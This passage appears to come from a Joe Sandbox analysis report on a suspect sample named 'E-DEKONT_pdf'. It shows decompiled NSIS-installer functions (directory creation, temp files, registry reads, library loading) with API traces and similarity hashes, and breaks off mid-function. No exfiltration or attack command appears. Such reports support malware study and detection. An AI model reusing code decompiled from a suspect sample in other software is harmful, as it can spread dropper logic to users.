0x00405868
0x00405872
0x00405879
0x0040588f
0x00000000
0x00000000
0x00000000
0x00405891
0x00405895

APIs

CreateDirectoryA.KERNELBASE(?,0000000B,007F9000), ref: 0040585E
GetLastError.KERNEL32 ref: 00405872
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405887
GetLastError.KERNEL32 ref: 00405891

Strings

7@, xrefs: 00405830

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: 7@
API String ID: 3449924974-48919864
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 776ade97b95de8c7d2b46bb8ae0b91a032d8614f7eaf99ef62f682375182682f
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: CD010872D00219EADF109BA1C944BEFBBB4EF04354F04843AD944B6190DB789658CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405CB4(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406234(0x7bad70, _a4);
				_t21 = E00405C5F(0x7bad70);
				if(_t21 != 0) {
					E00406512(_t21);
					if(( *0x7c5f78 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7bad70;
						while(1) {
							_t11 = lstrlenA(0x7bad70);
							_push(0x7bad70);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004065AB();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C0D(0x7bad70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cc0
0x00405ccb
0x00405ccf
0x00405cd6
0x00405ce2
0x00405cee
0x00405cee
0x00405d06
0x00405d07
0x00405d0e
0x00405d0f
0x00000000
0x00000000
0x00405cf2
0x00405cf9
0x00405d01
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cf9
0x00405d11
0x00405d17
0x00000000
0x00405d25
0x00405ce4
0x00405ce8
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ce8
0x00405cd1
0x00000000

APIs

Part of subcall function 00406234: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403533,007C1F60,NSIS Error,?,00000007,00000009,0000000B), ref: 00406241

Part of subcall function 00405C5F: CharNextA.USER32(?,?,C:\,0000000B,00405CCB,C:\,C:\,767C3410,?,007F9000,00405A16,?,767C3410,007F9000,007EF000), ref: 00405C6D
Part of subcall function 00405C5F: CharNextA.USER32(00000000), ref: 00405C72
Part of subcall function 00405C5F: CharNextA.USER32(00000000), ref: 00405C86

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,767C3410,?,007F9000,00405A16,?,767C3410,007F9000,007EF000), ref: 00405D07
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,767C3410,?,007F9000,00405A16,?,767C3410,007F9000), ref: 00405D17

Strings

C:\, xrefs: 00405CBA, 00405CBF, 00405CC5, 00405D00, 00405D06, 00405D0E, 00405D16

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 640e8f29881e7450eab0cb04f5be9d3b5334d53e2352fca671a70c513fa980b5
Instruction ID: b2f90c104d091caefbdf248ad6eecd547c4a548a9290806d3cb0df0cb8eaf4a6
Opcode Fuzzy Hash: 640e8f29881e7450eab0cb04f5be9d3b5334d53e2352fca671a70c513fa980b5
Instruction Fuzzy Hash: 34F0A421109E5126E62632392D09A9F2A45CE86364719417FF852B12D6DA3C8892E97E

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405DF6(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405dfa
0x00405e00
0x00405e01
0x00405e01
0x00405e06
0x00405e07
0x00405e0a
0x00405e14
0x00405e21
0x00405e24
0x00405e2c
0x00000000
0x00000000
0x00405e30
0x00000000
0x00000000
0x00405e32
0x00000000
0x00405e32
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E0A
GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,0040338E,007F7000,007F9000,007F9000,007F9000,007F9000,007F9000,007F9000,0040366D,?,00000007), ref: 00405E24

Strings

nsa, xrefs: 00405E01

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: b539df49976acb950e7ba8a000158db73584ae344042610fd92299246841c882
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 86F0A736304208BBEB108F56ED04B9B7B9CDF91750F10C03BF988DB290D6B5D9548798

Uniqueness

Uniqueness Score: -1.00%

Function 6EC91606 Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E6EC91606(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ec95040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ec9503c =  *((intOrPtr*)(_t87 + 0x64));
				 *0x6ec95038 =  *((intOrPtr*)(_t87 + 0x60));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x6c)) + 0xc))( *0x6ec95014, E6EC912F7, _t84);
				_push("true");
				_t37 = E6EC92288();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6EC91EDD(_t85);
					}
					E6EC91F58(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6EC92128(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x818; // 0x818
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6EC91E71(_t85, _t87 + 0x30);
								 *(_t85 + 0x834) =  *(_t85 + 0x834) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x820)) = _t43;
								 *_t56 = 3;
								E6EC92128(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6EC92128(_t85);
							_t37 = GlobalFree(E6EC9157E(E6EC915F4(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6EC91F1F(_t85);
							_t62 =  *(_t85 + 0x810);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x808);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x810);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6EC91558( *0x6ec9502c);
							}
						}
						if(( *(_t85 + 0x810) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6EC92E4F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6EC92BC4(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6EC91774();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6ec91606
0x6ec91606
0x6ec91606
0x6ec9160d
0x6ec91616
0x6ec91620
0x6ec91634
0x6ec91637
0x6ec91639
0x6ec9163e
0x6ec91643
0x6ec9176f
0x6ec91773
0x6ec91649
0x6ec9164d
0x6ec91650
0x6ec91655
0x6ec91657
0x6ec91661
0x6ec91699
0x6ec916a0
0x6ec916c4
0x6ec91712
0x6ec916c6
0x6ec916c6
0x6ec916c7
0x6ec916c8
0x6ec916cb
0x6ec916d0
0x6ec916d0
0x6ec916dd
0x6ec916e0
0x6ec916e5
0x6ec916ed
0x6ec916f3
0x6ec916f9
0x6ec91709
0x6ec9170a
0x6ec9170e
0x6ec916a2
0x6ec916a3
0x6ec916b8
0x6ec916b8
0x6ec9171c
0x6ec9171f
0x6ec91725
0x6ec9172b
0x6ec91730
0x6ec91738
0x6ec91740
0x6ec91743
0x6ec91749
0x6ec91749
0x6ec91740
0x6ec91751
0x6ec91759
0x6ec9175e
0x6ec91751
0x6ec91766
0x6ec91769
0x6ec91769
0x00000000
0x6ec91766
0x6ec91666
0x6ec91669
0x6ec9168e
0x00000000
0x00000000
0x6ec91691
0x6ec91696
0x6ec91696
0x6ec91698
0x00000000
0x6ec91698
0x6ec9166b
0x6ec9166e
0x6ec9167a
0x6ec9167b
0x00000000
0x6ec9167b
0x6ec91670
0x6ec91673
0x6ec91682
0x6ec91683
0x00000000
0x6ec91683
0x6ec91678
0x00000000
0x00000000
0x00000000
0x6ec91678

APIs

Part of subcall function 6EC92288: GlobalFree.KERNEL32(?), ref: 6EC92901
Part of subcall function 6EC92288: GlobalFree.KERNEL32(?), ref: 6EC92907
Part of subcall function 6EC92288: GlobalFree.KERNELBASE(?), ref: 6EC9290D

GlobalFree.KERNEL32(00000000), ref: 6EC916B8
FreeLibrary.KERNEL32(?), ref: 6EC91743
GlobalFree.KERNELBASE(00000000), ref: 6EC91769

Part of subcall function 6EC91EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 6EC91F0C

Part of subcall function 6EC91774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6EC91688,00000000), ref: 6EC91817

Part of subcall function 6EC91E71: wsprintfA.USER32 ref: 6EC91EA4

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 9467774e6e26ee534bdb45519e3648fbd250b76a6d7395e51a4a50d3f23269e6
Instruction ID: 5cfe31a62fe86b34cd07cbaf97a0f03c9cd9b796aa906438577f92b618e35c35
Opcode Fuzzy Hash: 9467774e6e26ee534bdb45519e3648fbd250b76a6d7395e51a4a50d3f23269e6
Instruction Fuzzy Hash: BB41E43140034E9FDB909FAC9956BDE37ECFB01315F028819F9595A185FB34994CEBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040611B Relevance: 3.0, APIs: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040611B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x2000;
				_t21 = E004060BA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406129
0x0040612b
0x00406143
0x00406148
0x0040614d
0x0040618a
0x0040618a
0x0040614f
0x00406161
0x0040616c
0x00406172
0x0040617c
0x00000000
0x00000000
0x0040617c
0x0040618f

APIs

RegQueryValueExA.KERNELBASE(-00008098,007BDF00,00000000,?,007BDF00,00002000,007BDF00,?,?,-00008098,-00008098,00000002,-00008098,?,004063D3,80000002), ref: 00406161
RegCloseKey.KERNELBASE(-00008098,?,004063D3,80000002,Software\Microsoft\Windows\CurrentVersion,-00008098,007BDF00,007BDF00,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll), ref: 0040616C

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 7056b7a96e9edebd67e9f8198eb1911ecb61e0a26e20b736ac15770181a1f0eb
Instruction ID: 454a0a257b23ff5dc715ee1e92252fb99340fc497e2045281c6685e12c18df0f
Opcode Fuzzy Hash: 7056b7a96e9edebd67e9f8198eb1911ecb61e0a26e20b736ac15770181a1f0eb
Instruction Fuzzy Hash: E0015E72500209BFDF218F51CC09FDB3BA9EF55394F01803AFD5996191D274D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7c5f90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7c1f4c =  *0x7c1f4c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7c1f4c, 0x7530,  *0x7c1f34), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e8767fc4308ce77e1ef00f61b5c19187fbfe80af0fb56f169463e399743e325e
Instruction ID: 94a94e43fb3c158426163a02108a3c171968d0c2e7a0bb146e3e03d0305ae0e9
Opcode Fuzzy Hash: e8767fc4308ce77e1ef00f61b5c19187fbfe80af0fb56f169463e399743e325e
Instruction Fuzzy Hash: B601D1326242109FE7195B389D04B6A3698E711314F50813EB855F61F1DB788C129B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406640 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406640(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004065D2(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406648
0x0040664b
0x00406652
0x0040665a
0x00406666
0x00000000
0x0040666d
0x0040665d
0x00406664
0x00000000
0x00406675
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000000,?,004034D2,0000000B), ref: 00406652
GetProcAddress.KERNEL32(00000000,?), ref: 0040666D

Part of subcall function 004065D2: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065E9
Part of subcall function 004065D2: wsprintfA.USER32 ref: 00406622
Part of subcall function 004065D2: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406636

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
Instruction ID: 242b18aafc5ba73b32c5259cbd30a1984926b7b349da2466b6a1c90bd4b5b0b3
Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
Instruction Fuzzy Hash: 50E0863260421067D2215670AE08D3B72B89E84750702083EF547F2140DB399C31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA2(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
